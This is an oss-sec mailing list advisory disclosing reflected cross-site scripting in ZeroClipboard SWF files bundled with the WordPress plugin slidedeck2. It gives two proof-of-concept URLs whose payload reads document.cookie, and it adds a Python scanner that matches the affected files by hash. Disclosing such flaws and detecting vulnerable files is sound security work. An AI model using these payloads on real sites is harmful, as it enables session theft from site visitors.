oss-sec mailing list archives
Re: WordPress plugins vulnerable to CVE-2013-1808
From: Henri Salo <henri () nerv fi>
Date: Thu, 14 Mar 2013 11:06:20 +0200
On Sun, Mar 10, 2013 at 10:52:07AM +0200, Henri Salo wrote:
Plugin: slidedeck2
Version: 2.1.20130306

Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard.swf
406ca1ec9595fd96424e6c8f3802bc898f080116
PoC: wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Affected file: http://plugins.svn.wordpress.org/slidedeck2/trunk/js/zeroclipboard/ZeroClipboard10.swf
1ea0fc0cea30a7d912c2564d51204a816f1e58be
PoC: wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This has been fixed in 2.1.20130306 version. Changelog
http://wordpress.org/extend/plugins/slidedeck2/changelog/ says:

2.1.20130306
Security improvements

Again no CVE added to changelog and reporter (me) not notified about fixes done.

--
Henri Salo
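An added example, not part of the original post: a scanner that walks a plugins directory and flags bundled ZeroClipboard SWF files whose digest matches either of the two values quoted in the message. It assumes the 40-hex-digit values are SHA-1 digests and that the tree to check is wp-content/plugins; the function names are hypothetical.

```python
import hashlib
import os
import sys

# Digests quoted in the post for the two affected files. They are 40 hex
# digits long, so this example assumes they are SHA-1.
REPORTED = {
    "406ca1ec9595fd96424e6c8f3802bc898f080116": "ZeroClipboard.swf",
    "1ea0fc0cea30a7d912c2564d51204a816f1e58be": "ZeroClipboard10.swf",
}


def sha1_of(path, chunk=65536):
    """Hash a file in chunks so large files are not read into memory at once."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan(root, known=REPORTED):
    """Return sorted (path, sha1, status) for each ZeroClipboard*.swf under root.

    status is "reported" when the digest matches one quoted in the post and
    "review" otherwise: a different build of the same component, which this
    script cannot classify and which should be checked by hand.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            low = name.lower()
            if low.startswith("zeroclipboard") and low.endswith(".swf"):
                path = os.path.join(dirpath, name)
                digest = sha1_of(path)
                status = "reported" if digest in known else "review"
                findings.append((path, digest, status))
    return sorted(findings)


if __name__ == "__main__":
    # Assumed default location; pass another directory as the first argument.
    root = sys.argv[1] if len(sys.argv) > 1 else "wp-content/plugins"
    for path, digest, status in scan(root):
        print(f"{status:8} {digest}  {path}")
```

A "review" result is not a clean bill of health: it only means the file is a ZeroClipboard SWF with a digest other than the two in the post.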